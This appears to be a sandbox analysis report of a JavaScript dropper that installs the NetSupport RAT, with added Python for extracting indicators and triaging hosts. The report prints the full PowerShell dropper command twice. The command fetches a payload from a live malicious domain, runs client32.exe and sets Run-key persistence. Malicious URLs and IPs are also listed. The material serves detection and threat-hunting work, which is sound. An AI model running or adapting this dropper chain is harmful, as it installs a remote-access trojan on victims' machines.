Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $vwkxivyiuk='https://ggoryo.com/trade/da.php?9800';$qbosaxlnlpu=(new-object system.net.webclient).downloadstring($vwkxivyiuk);$zrpu=[system.convert]::frombase64string($qbosaxlnlpu);$asd = get-random -minimum -5 -maximum 12; $jdkprjil=[system.environment]::getfolderpath('applicationdata')+'\eqmiufuuucw'+$asd;if (!(test-path $jdkprjil -pathtype container)) { new-item -path $jdkprjil -itemtype directory };$p=join-path $jdkprjil 'cxcc.zip';[system.io.file]::writeallbytes($p,$zrpu);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$jdkprjil)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $jdkprjil 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $jdkprjil -force; $fd.attributes='hidden';$s=$jdkprjil+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='diwfe';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
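The wscript.exe to powershell.exe command line recorded above is the complete stage-one dropper: download a Base64 blob from ggoryo.com, write it to a ZIP under %APPDATA%, extract and launch client32.exe, hide the folder, and add an HKCU Run value named DIWFE. As an added example, not part of the Joe Sandbox report, the Python below parses that command line into hunt IOCs and scores it. The indicator names, the scoring scheme and the SAMPLE_CMDLINE constant (copied from the evidence line) are ours; the one practitioner caveat it encodes is that the drop folder suffix comes from Get-Random -Minimum -5 -Maximum 12, so EQMIUFUUUCW3 seen in this run is only one of 17 possible names.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample input: the powershell.exe command line this report shows wscript.exe
# spawning, reproduced from the "Process created" evidence line above.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C '
    r"$VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';"
    r"$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);"
    r"$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);"
    r"$asd = Get-Random -Minimum -5 -Maximum 12; "
    r"$JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;"
    r"if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };"
    r"$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);"
    r"try { Add-Type -A System.IO.Compression.FileSystem;"
    r"[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};"
    r"$CV=Join-Path $JDKPRJIL 'client32.exe';"
    r"if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};"
    r"$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';"
    r"$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';"
    r"New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"
)

# One indicator per dropper stage (names are ours; each pattern matches the command line above).
DROPPER_INDICATORS: Dict[str, str] = {
    "exec_policy_bypass": r"-ex(?:ecutionpolicy)?\s+bypass",
    "no_profile": r"-nop(?:rofile)?\b",
    "download_string": r"\.DownloadString\(",
    "base64_decode": r"FromBase64String\(",
    "write_bytes": r"WriteAllBytes\(",
    "zip_extract": r"ZipFile\]::ExtractToDirectory\(",
    "start_process": r"Start-Process\b",
    "hidden_attribute": r"attributes\s*=\s*'Hidden'",
    "run_key_persistence": r"CurrentVersion\\Run",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # the parents this report's Sigma rules key on


def match_indicators(cmdline: str) -> List[str]:
    """Names of the dropper stages present in a command line, in pipeline order."""
    return [n for n, p in DROPPER_INDICATORS.items() if re.search(p, cmdline, re.IGNORECASE)]


def literal_assignments(cmdline: str) -> Dict[str, str]:
    """Collect $var='literal' assignments so indirection such as -Name $v can be resolved."""
    return {name: val for name, val in re.findall(r"\$(\w+)\s*=\s*'([^']*)'", cmdline)}


def _resolve(token: str, table: Dict[str, str]) -> str:
    return table.get(token[1:], token) if token.startswith("$") else token.strip("'")


def extract_iocs(cmdline: str) -> Dict[str, str]:
    """Pull the hunt-relevant literals out of the one-liner."""
    table = literal_assignments(cmdline)
    iocs: Dict[str, str] = {}
    m = re.search(r"https?://[^'\"\s;)]+", cmdline)
    if m:
        iocs["stage2_url"] = m.group(0)
    m = re.search(r"GetFolderPath\('(\w+)'\)\+'\\([A-Za-z0-9_]+)'\+\$(\w+)", cmdline)
    if m:
        iocs["drop_dir_parent"], iocs["drop_dir_prefix"] = m.group(1), m.group(2)
    m = re.search(r"New-ItemProperty\s+-Path\s+(\S+)\s+-Name\s+(\S+)\s+-Value\s+(\S+)", cmdline, re.I)
    if m:
        iocs["run_key"] = _resolve(m.group(1), table)
        iocs["run_value_name"] = _resolve(m.group(2), table)
    for ext in ("zip", "exe"):
        m = re.search(r"Join-Path\s+\$\w+\s+'([^']+\." + ext + ")'", cmdline, re.I)
        if m:
            iocs["dropped_" + ext] = m.group(1)
    return iocs


def candidate_drop_dirs(cmdline: str) -> List[str]:
    """Expand the Get-Random range into every folder name the dropper can pick.
    PowerShell's -Maximum is exclusive, so -Minimum -5 -Maximum 12 yields -5..11 (17 names);
    hunting only for the EQMIUFUUUCW3 seen in this sandbox run would miss the other 16."""
    iocs = extract_iocs(cmdline)
    m = re.search(r"Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)", cmdline, re.I)
    if not m or "drop_dir_prefix" not in iocs:
        return []
    lo, hi = int(m.group(1)), int(m.group(2))
    return ["%APPDATA%\\" + iocs["drop_dir_prefix"] + str(n) for n in range(lo, hi)]


def classify(parent_image: str, cmdline: str) -> Tuple[int, List[str]]:
    """Score = number of matched stages, plus one when a script host is the parent process."""
    hits = match_indicators(cmdline)
    if parent_image.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        hits.insert(0, "script_host_parent")
    return len(hits), hits


if __name__ == "__main__":
    print(classify(r"C:\Windows\System32\wscript.exe", SAMPLE_CMDLINE))
    print(extract_iocs(SAMPLE_CMDLINE))
    print(candidate_drop_dirs(SAMPLE_CMDLINE))
```

Feed the same functions the CommandLine and ParentImage fields from Sysmon event 1 or Security event 4688 (with command-line auditing enabled) rather than the constant; the Run value name DIWFE and the EQMIUFUUUCW prefix are the stable strings in this sample, the numeric suffix is not.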
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,10_2_1109E5B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,10_2_1109ED30
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr; Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr; Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr; Binary or memory string: Progman
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_2_11174898
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_11174B29
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,10_2_11174BCC
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: GetLocaleInfoA,10_2_1116C24E
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_2_11174796
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_111746A1
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_2_1117483D
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_11174B90
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_11174A69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,10_2_110F37A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,10_2_11134830
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,10_2_11147160
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,10_2_1117594C
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,10_2_11145C70
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,10_2_11070430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_6CA8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,10_2_6CA8A980
Source: Yara match; File source: 10.2.client32.exe.747f0000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.0.client32.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.client32.exe.73a80000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.client32.exe.6ca80000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.powershell.exe.26c00bcaaf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.powershell.exe.26c00bc08a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.powershell.exe.26c00ba9ff8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED
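The six DROPPED Yara matches above, plus remcmdstub.exe from the behaviour graph, are the NetSupport Manager client file set; the same DLLs ship with a licensed install, so what marks this deployment as a RAT is their location under a user profile and the HKCU Run value pointing at them. As an added example, not part of the Joe Sandbox report, the Python below triages a host by grouping a file listing by directory, looking for that component set, and correlating each directory with the Run values that launch from it. The file listing, the Run values and the Program Files install path are constructed sample data, and the three-component threshold is our choice.

```python
import ntpath
from typing import Dict, Iterable, List, Set

# Component names this report shows dropped beside client32.exe (DROPPED Yara matches plus
# remcmdstub.exe from the behaviour graph), lower-cased for case-insensitive comparison.
NETSUPPORT_COMPONENTS = {
    "client32.exe", "pcicl32.dll", "htctl32.dll", "tcctl32.dll",
    "pcicapi.dll", "pcichek.dll", "remcmdstub.exe",
}

# Constructed sample host data (not captured from the sandbox run): a file listing and the
# HKCU\...\CurrentVersion\Run values. The Program Files entries assume a legitimate install.
SAMPLE_FILES = [
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe",
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL",
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL",
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL",
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll",
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL",
    r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\CXCC.zip",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL",
    r"C:\Users\user\Downloads\notes.txt",
]
SAMPLE_RUN_VALUES = {
    "DIWFE": r"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe",
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}


def _run_target_dirs(run_values: Dict[str, str]) -> Dict[str, List[str]]:
    """Map the normalised directory of each Run value's executable to the value names."""
    out: Dict[str, List[str]] = {}
    for name, cmd in run_values.items():
        # Quoted commands carry the image in the first quoted token; bare ones up to the first space.
        exe = cmd.split('"')[1] if cmd.startswith('"') else cmd.split(" ")[0]
        out.setdefault(ntpath.normcase(ntpath.dirname(exe)), []).append(name)
    return out


def triage(files: Iterable[str], run_values: Dict[str, str], min_components: int = 3) -> List[dict]:
    """Report every directory holding at least min_components NetSupport client files.
    Verdict is 'suspicious' when the set lives under a user profile or is wired to a Run value,
    'review' otherwise. Results are sorted so 'review' entries precede 'suspicious' ones."""
    by_dir: Dict[str, Set[str]] = {}
    for path in files:
        d, name = ntpath.split(path)
        by_dir.setdefault(ntpath.normcase(d), set()).add(name.lower())
    persisted = _run_target_dirs(run_values)
    findings = []
    for d, names in by_dir.items():
        comps = sorted(names & NETSUPPORT_COMPONENTS)
        if len(comps) < min_components:
            continue
        in_profile = "\\users\\" in d and "\\appdata\\" in d
        run_names = persisted.get(d, [])
        findings.append({
            "dir": d,
            "components": comps,
            "run_values": run_names,
            "verdict": "suspicious" if (in_profile or run_names) else "review",
        })
    return sorted(findings, key=lambda f: f["verdict"])


if __name__ == "__main__":
    for f in triage(SAMPLE_FILES, SAMPLE_RUN_VALUES):
        print(f["verdict"], f["dir"], f["components"], f["run_values"])
```

On a live host the file listing would come from walking %APPDATA% and %LOCALAPPDATA% (with hidden attributes included, since the dropper sets the folder Hidden) and the Run values from HKCU and HKLM; the correlation step is what separates this sample from a NetSupport install an administrator put in place.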
MITRE ATT&CK matrix (a number in front of a technique is the count badge the original page shows beside it):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 12 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 12 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 4 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 4 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement |
| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 2 Valid Accounts | 21 Access Token Manipulation | 11 Software Packing | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 1 DLL Side-Loading | NTDS | 34 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 2 Service Execution | 1 Registry Run Keys / Startup Folder | 113 Process Injection | 1 Masquerading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | 3 PowerShell | RC Scripts | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 113 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
Behavior Graph ID: 1529030
Sample: Update.js
Startdate: 08/10/2024
Architecture: WINDOWS
Score: 100

Node 2 (sample Update.js):
  2->34 ggoryo.com
  2->36 geo.netsupportsoftware.com
  2->48 Suricata IDS alerts for network traffic
  2->50 Malicious sample detected (through community Yara rule)
  2->52 Sigma detected: Powershell drops NetSupport RAT client
  2->54 6 other signatures
  2->8 wscript.exe 1 7 (started)

Node 8 (wscript.exe):
  8->38 ggoryo.com 77.83.199.112, 443, 49705, 49707 ASN-MOLMoscowRussiaRU Lithuania
  8->56 System process connects to network (likely due to code injection or exploit)
  8->58 Suspicious powershell command line found
  8->60 Wscript starts Powershell (via cmd or directly)
  8->62 2 other signatures
  8->12 powershell.exe 15 35 (started)

Node 12 (powershell.exe):
  12->22 C:\Users\user\AppData\...\remcmdstub.exe, PE32 (dropped)
  12->24 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 (dropped)
  12->26 C:\Users\user\AppData\...\client32.exe, PE32 (dropped)
  12->28 6 other files (5 malicious) (dropped)
  12->64 Found suspicious powershell code related to unpacking or dynamic code loading
  12->66 Powershell drops PE file
  12->16 client32.exe 16 (started)
  12->20 conhost.exe (started)

Node 16 (client32.exe):
  16->30 5.181.159.137, 443, 49708 MIVOCLOUDMD Moldova Republic of
  16->32 geo.netsupportsoftware.com 104.26.1.231, 49709, 80 CLOUDFLARENETUS United States
  16->40 Multi AV Scanner detection for dropped file
  16->42 Contains functionality to change the wallpaper
  16->44 Delayed program exit found
  16->46 Contains functionality to detect sleep reduction / modifications

                                No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL | 13% | ReversingLabs | Win32.Trojan.Generic | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL | 5% | ReversingLabs | - | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL | 17% | ReversingLabs | - | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL | 6% | ReversingLabs | - | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | 27% | ReversingLabs | Win32.Trojan.NetSupport | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll | 3% | ReversingLabs | - | -
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe | 24% | ReversingLabs | Win32.Trojan.Generic | -
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | -
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | -
https://go.micro | 0% | URL Reputation | safe | -
http://ocsp.thawte.com0 | 0% | URL Reputation | safe | -
https://contoso.com/License | 0% | URL Reputation | safe | -
https://contoso.com/Icon | 0% | URL Reputation | safe | -
http://www.symauth.com/cps0( | 0% | URL Reputation | safe | -
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe | -
http://www.symauth.com/rpa00 | 0% | URL Reputation | safe | -
https://contoso.com/ | 0% | URL Reputation | safe | -
https://nuget.org/nuget.exe | 0% | URL Reputation | safe | -
https://aka.ms/pscore68 | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
https://oneget.org | 0% | URL Reputation | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.1.231 | true | false | - | unknown
ggoryo.com | 77.83.199.112 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geo.netsupportsoftware.com/location/loca.asp | false | - | unknown
http://5.181.159.137/fakeurl.htm | true | - | unknown
https://ggoryo.com/trade/da.php?9800 | true | - | unknown
https://ggoryo.com/trade/fix.php?6867 | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com/intl/en-US/chrome/blank.htmlX | wscript.exe, 00000000.00000003.1253318916.000001FC539D9000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
